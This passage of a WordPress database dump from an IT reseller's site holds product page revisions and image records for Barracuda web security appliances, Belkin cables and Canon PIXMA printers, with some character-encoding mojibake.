(3)','','inherit','closed','closed','','cq5dam-web-372-372-3','','','2018-12-18 10:39:45','2018-12-18 02:39:45','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg',0,'attachment','image/jpeg',0),(2693,1,'2018-12-21 09:59:50','2018-12-21 01:59:50','<h3>Filters Content, Malware, Social Media and Rogue App Threats</h3>\r\nThe Barracuda Web Security Gateway lets organizations benefit from online applications and tools without exposure to web-borne malware and viruses, lost user productivity, and misused bandwidth. As a comprehensive solution for web security and management, it unites award-winning spyware, malware, and virus protection with a powerful policy and reporting engine. Advanced features ensure that organizations adapt to emerging requirements like social-network regulation, remote filtering, and visibility into SSL-encrypted traffic.\r\n\r\nUnlimited remote user licenses are included to enforce content and access policies for mobile and desktop devices outside of the corporate network. The Barracuda Web Security Gateway is also available as a virtual appliance.\r\n<h3>Enforce Corporate Policies</h3>\r\n<img class=\"alignnone wp-image-2408\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ENFORCE-CORPORATE-POLICIES.png\" alt=\"\" width=\"268\" height=\"244\" />\r\n\r\nIncrease productivity, regulate bandwidth usage, and prevent risky behavior by enforcing granular policies on user activities. The Barracuda Web Security Gateway can control access to web sites, applications, and Web 2.0 platforms based on users, groups, time, bandwidth, and other criteria. SSL-filtering and inspection capabilities provide policy enforcement on social-media and search platforms that are otherwise obfuscated.\r\n<h3>Protect Against Web-Based Threats</h3>\r\n<img class=\"alignnone wp-image-2409\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Protect-Against-Web-Based-Threats.png\" alt=\"\" width=\"326\" height=\"179\" />\r\n\r\nKeep networks and users safe by blocking spyware downloads, preventing viruses, and restricting requests to malicious websites by leveraging intelligence from thousands of collection points worldwide. Our award-winning antivirus and anti-spyware technologies combine preventive, proactive, and reactive measures to deliver industry-leading content filtering and malware protection.\r\n<h3>Monitor Network and User Activity</h3>\r\n<img class=\"alignnone wp-image-2407\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MONITOR-NETWORK-AND-USER-ACTIVITY.png\" alt=\"\" width=\"283\" height=\"230\" />\r\n\r\nGain complete insight into user activity and network threats via an intuitive dashboard and integrated reporting. This clear visibility lets administrators create effective policies and generate proactive alerts to properly respond to threats.\r\n\r\nIn addition to powerful on-board reporting, you can also deploy a Barracuda Reporting Server.\r\n\r\nThe Barracuda Reporting Server is a powerful platform that enables unified reporting for Barracuda Web Security Gateways. Designed to meet the demands of reporting on increasing amounts of user and security data, the Barracuda Reporting Server generates accurate, customizable reports in a fraction of the time that it takes built-in reporting engines, while also enabling aggregated reports for multiple connected devices.\r\n<h3>Secure Laptops and Mobile Devices</h3>\r\n<img class=\"alignnone wp-image-2410\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SECURE-LAPTOPS-AND-MOBILE-DEVICES.png\" alt=\"\" width=\"291\" height=\"227\" />\r\n\r\nExtend security and policies to remote users.Â  With the Barracuda Web Security Agent and the Barracuda Safe Browser, traffic from remote clients can be filtered with the same policies set for on-network users.\r\n<h3>Simplify Management</h3>\r\n<img class=\"alignnone wp-image-2411\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SIMPLIFY-MANAGEMENT.png\" alt=\"\" width=\"245\" height=\"237\" />\r\n\r\nCentrally manage the Barracuda Web Security Gateway through the cloud. Configurations on the Barracuda Web Security Gateway are simple and easy-to-deploy ensuring customized network protection is in place in a matter of minutes.\r\n\r\n<img class=\"categoryImage dataImage\" src=\"https://www.barracuda.com/assets/images/common/data_protection.svg\" alt=\"Barracuda Data Protection Icon\" width=\"21\" height=\"24\" />Â  <strong>Data Protection</strong>\r\n\r\nBarracuda\'s all-in-one approach to data protection makes it easier than ever to protect your business from data loss and theft. Data can be backed up to any location including the public cloud -- eliminating the need to purchase and manage backup solutions from multiple vendors. You can even back up your cloud-based Office 365 data such as emails. All backed up data is replicated to the secure Barracuda cloud with unlimited storage.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]','Barracuda','','inherit','closed','closed','','1445-revision-v1','','','2018-12-21 09:59:50','2018-12-21 01:59:50','',1445,'https://bintara.com.my/blog/2018/12/21/1445-revision-v1/',0,'revision','',0),(2336,1,'2018-12-18 10:43:48','2018-12-18 02:43:48','','cq5dam.web.372.372 (4)','','inherit','closed','closed','','cq5dam-web-372-372-4','','','2018-12-18 10:43:48','2018-12-18 02:43:48','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg',0,'attachment','image/jpeg',0),(2337,1,'2018-12-18 10:44:28','2018-12-18 02:44:28','','cq5dam.web.372.372 (5)','','inherit','closed','closed','','cq5dam-web-372-372-5','','','2018-12-18 10:44:28','2018-12-18 02:44:28','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg',0,'attachment','image/jpeg',0),(2410,1,'2018-12-18 19:55:35','2018-12-18 11:55:35','','SECURE LAPTOPS AND MOBILE DEVICES','','inherit','closed','closed','','secure-laptops-and-mobile-devices','','','2018-12-18 19:55:35','2018-12-18 11:55:35','',1445,'https://bintara.com.my/wp-content/uploads/2018/12/SECURE-LAPTOPS-AND-MOBILE-DEVICES.png',0,'attachment','image/png',0),(2411,1,'2018-12-18 19:55:37','2018-12-18 11:55:37','','SIMPLIFY MANAGEMENT','','inherit','closed','closed','','simplify-management','','','2018-12-18 19:55:37','2018-12-18 11:55:37','',1445,'https://bintara.com.my/wp-content/uploads/2018/12/SIMPLIFY-MANAGEMENT.png',0,'attachment','image/png',0),(2338,1,'2018-12-18 10:45:39','2018-12-18 02:45:39','','cq5dam.web.372.372 (6)','','inherit','closed','closed','','cq5dam-web-372-372-6','','','2018-12-18 10:45:39','2018-12-18 02:45:39','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg',0,'attachment','image/jpeg',0),(2339,1,'2018-12-18 10:46:27','2018-12-18 02:46:27','','cq5dam.web.372.372 (7)','','inherit','closed','closed','','cq5dam-web-372-372-7','','','2018-12-18 10:46:27','2018-12-18 02:46:27','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg',0,'attachment','image/jpeg',0),(2340,1,'2018-12-18 10:47:15','2018-12-18 02:47:15','','webdam.web.372.372','','inherit','closed','closed','','webdam-web-372-372','','','2018-12-18 10:47:15','2018-12-18 02:47:15','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg',0,'attachment','image/jpeg',0),(2409,1,'2018-12-18 19:52:26','2018-12-18 11:52:26','','Protect Against Web-Based Threats','','inherit','closed','closed','','protect-against-web-based-threats','','','2018-12-18 19:52:26','2018-12-18 11:52:26','',1445,'https://bintara.com.my/wp-content/uploads/2018/12/Protect-Against-Web-Based-Threats.png',0,'attachment','image/png',0),(2341,1,'2018-12-18 10:47:52','2018-12-18 02:47:52','','cq5dam.web.372.372 (8)','','inherit','closed','closed','','cq5dam-web-372-372-8','','','2018-12-18 10:47:52','2018-12-18 02:47:52','',1446,'https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg',0,'attachment','image/jpeg',0),(2342,1,'2018-12-18 10:50:03','2018-12-18 02:50:03','<h3>THE BELKIN DIFFERENCE</h3>\r\n<h4>Innovation, with quality at its core</h4>\r\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\r\n<h4>Global leader in tech.</h4>\r\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\r\n<h4>Always looking to the future</h4>\r\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\r\n<h4>An unwavering commitment to earning your trust.</h4>\r\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\r\n<h4>Unmatched performance, every time</h4>\r\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\r\n<h4>We believe good design matters.</h4>\r\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\r\n\r\n[maxbutton id=\"1\" ]\r\n<h4>Product : -</h4>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2329\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2330\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\r\n\r\nUltra HD High Speed HDMIÂ® Cable</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2331\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nGold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2332\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nMini DisplayPortTM to VGA</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nMicro HDMI Adapter</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2335\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB A/B Device Cable * A/B;DSTP;</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2336\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.5 mm Audio + Charge RockStarâ„¢</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2337\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2338\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2339\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2340\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2341\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nLightning Audio + Charge RockStarâ„¢</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[maxbutton id=\"1\" ]','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2018-12-18 10:50:03','2018-12-18 02:50:03','',1446,'https://bintara.com.my/blog/2018/12/18/1446-revision-v1/',0,'revision','',0),(2407,1,'2018-12-18 19:37:56','2018-12-18 11:37:56','','MONITOR NETWORK AND USER ACTIVITY','','inherit','closed','closed','','monitor-network-and-user-activity','','','2018-12-18 19:37:56','2018-12-18 11:37:56','',1445,'https://bintara.com.my/wp-content/uploads/2018/12/MONITOR-NETWORK-AND-USER-ACTIVITY.png',0,'attachment','image/png',0),(2343,1,'2018-12-18 10:51:37','2018-12-18 02:51:37','<h3>THE BELKIN DIFFERENCE</h3>\r\n<h4>Innovation, with quality at its core</h4>\r\nFor 35 years, Belkin has been creating products that simplify your life and empower you to fully leverage technology. The Belkin Difference ensures that every product is thoughtfully engineered, made of the highest-quality materials and thoroughly tested before making its way to you.\r\n<h4>Global leader in tech.</h4>\r\nWith two products sold every second across 50 countries, we are the leader in cables and connectivity and the #1 third-party maker of wireless charging accessories.\r\n<h4>Always looking to the future</h4>\r\nTechnology is constantly evolving. We combine extensive research and development with more than three decades of experience anticipating user needs to make sure weâ€™re ready and youâ€™re covered, no matter what the future holds.\r\n<h4>An unwavering commitment to earning your trust.</h4>\r\nOur rigorous testing and end-to-end control of the manufacturing process allows us to ensure the highest standards are met. We stand behind the quality and safety of our work â€“ thatâ€™s why we back our products with robust warranties.\r\n<h4>Unmatched performance, every time</h4>\r\nWe know you depend on our products, and we take this responsibility very seriously. Our above-and-beyond testing ensures we deliver supremely reliable quality you can always count on.\r\n<h4>We believe good design matters.</h4>\r\nThe Belkin team in Los Angeles, California thoughtfully designs every product to be innovative, dependable and easy to use. This masterful attention to detail has earned us over 130 awards, including more than 30 CES Innovation Awards and nearly 50 International Design Excellence Awards.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<h4>Product : -</h4>\r\n&nbsp;\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2329\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.1 USB-A to USB-Câ„¢ Cableï¼ˆUSB Type-Câ„¢ï¼‰</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2330\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.1000.1000.jpeg\" alt=\"\" width=\"1000\" height=\"1000\" />\r\n\r\nUltra HD High Speed HDMIÂ® Cable</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2331\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/372.png\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nGold-Plated High-Speed HDMI Cable with Ethernet 4K/Ultra HD Compatible</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2332\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-1.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nMini DisplayPortTM to VGA</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2334\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-2.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nMicro HDMI Adapter</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2335\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-3.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB A/B Device Cable * A/B;DSTP;</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2336\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-4.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.5 mm Audio + Charge RockStarâ„¢</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2337\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-5.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB-Câ„¢ to Gigabit Ethernet Adapter (USB Type-Câ„¢)</td>\r\n</tr>\r\n<tr>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2338\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-6.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\n3.0 USB-Câ„¢ to USB-A Adapter (USB Type-Câ„¢)</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2339\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-7.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB-Câ„¢ to HDMIÂ® Adapter (USB Type-C)</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2340\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/webdam.web_.372.372.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nUSB-Câ„¢ to HDMIÂ® Adapter (supports Dolby Vision)</td>\r\n<td width=\"150\"><img class=\"alignnone size-full wp-image-2341\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/cq5dam.web_.372.372-8.jpeg\" alt=\"\" width=\"372\" height=\"372\" />\r\n\r\nLightning Audio + Charge RockStarâ„¢</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[maxbutton id=\"1\" ]','Belkin','','inherit','closed','closed','','1446-revision-v1','','','2018-12-18 10:51:37','2018-12-18 02:51:37','',1446,'https://bintara.com.my/blog/2018/12/18/1446-revision-v1/',0,'revision','',0),(2715,1,'2018-12-21 16:42:09','2018-12-21 08:42:09','<h3>Printer :-</h3>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Advanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS9570</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G2010</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA E4270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank Wireless All-In-One with Fax for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"1\" ]</p>		\n			<h4>PIXMA TS8270</h4>		\n										<img src=\"https://bintara.com.my/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, ScanÂ  Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"1\" ]</p><h3>Printer :-</h3>\n<table>\n<tbody>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA E560 / E560R</strong>\nAdvanced Wireless All-In-One with Auto Duplex Printing for Low-Cost Printing\nThe Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.\nAvailable in Black and Red.\nPrint, Scan, Copy\nISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour\nHi-speed USB 2.0, WiFi\nRecommended print volume: 80 - 400 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA E4270</strong>\nCompact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\nPrint, Scan, Copy, Fax\nISO standard print speed (A4): 8.8ipm black / 4.4ipm colour\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\nRecommended print volume: 50 - 200 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA TS9570</strong>\nA3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder\nThis A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.\nPrint, Scan, Copy\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\nHi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct\nRecommended print volume: 80 - 300 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA TS8270</strong>\nWireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing\nThis advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.\nAvailable in Black, Red and White.\nPrint, Scan, Copy\nISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour\nHi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct\nRecommended print volume: 30 - 100 pages\n[maxbutton id=\"1\" ]</td>\n</tr>\n<tr>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMAÂ G2010</strong>\nRefillable Ink Tank All-In-One for High Volume Printing\nDesigned for high volume printing at low running cost\nPrint, Scan &amp; Copy\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\nHi-speed USB 2.0\nRecommended print volume: 150 - 1500 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA G4010</strong>\nRefillable Ink Tank Wireless All-In-One with Fax for High Volume Printing\nDesigned for high volume printing at low running cost.\nPrint, Scan, Copy and Fax\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode\nRecommended print volume: 150 - 1500 pages\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA G1010</strong>\nRefillable Ink Tank Printer for High Volume Printing\nDesigned for high volume printing at low running cost\nPrint\nISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)\nPhoto Speed (4 x 6\"): 60sec. (borderless)\n[maxbutton id=\"1\" ]</td>\n<td width=\"150\"><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-1.png\" alt=\"\" width=\"362\" height=\"320\" />\n<strong>PIXMA G3010</strong>\nRefillable Ink Tank Wireless All-In-One for High Volume Printing\nDesigned for high volume printing at low running cost\nPrint, ScanÂ  Copy\nISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour\nHi-speed USB 2.0, WiFi, Mopria, Access Point Mode\nRecommended print volume: 150 - 1500 pages\n[maxbutton id=\"1\" ]</td>\n</tr>\n</tbody>\n</table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2018-12-21 16:42:09','2018-12-21 08:42:09','',1449,'https://bintara.com.my/blog/2018/12/21/1449-revision-v1/',0,'revision','',0),(2345,1,'2018-12-18 11:16:05','2018-12-18 03:16:05','','e2f221acba7b4ca795be93654fafca7b_PIXMA+E560_2','','inherit','closed','closed','','e2f221acba7b4ca795be93654fafca7b_pixmae560_2','','','2018-12-18 11:16:05','2018-12-18 03:16:05','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png',0,'attachment','image/png',0),(2346,1,'2018-12-18 11:16:31','2018-12-18 03:16:31','','d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1','','inherit','closed','closed','','d6c6807e1827411dade7426d7b93df91_e42xx_as_fr_op3_blk_en-v1','','','2018-12-18 11:16:31','2018-12-18 03:16:31','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png',0,'attachment','image/png',0),(2347,1,'2018-12-18 11:17:25','2018-12-18 03:17:25','','099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3','','inherit','closed','closed','','099574dcdd504b0cbb4abac1a221c06e_ts95xx_as_fr_cl_blk_en-v3-3','','','2018-12-18 11:17:25','2018-12-18 03:17:25','',1449,'https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png',0,'attachment','image/png',0),(2348,1,'2018-12-18 11:18:13','2018-12-18 03:18:13','','6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1','','inherit','closed','closed','','6d6849f01d6c4e57b1c4a71de1bcd439_ts82xx_as_sk_op3_blk_en-v1','','','2018-12-18 11:18:13','2018-12-18 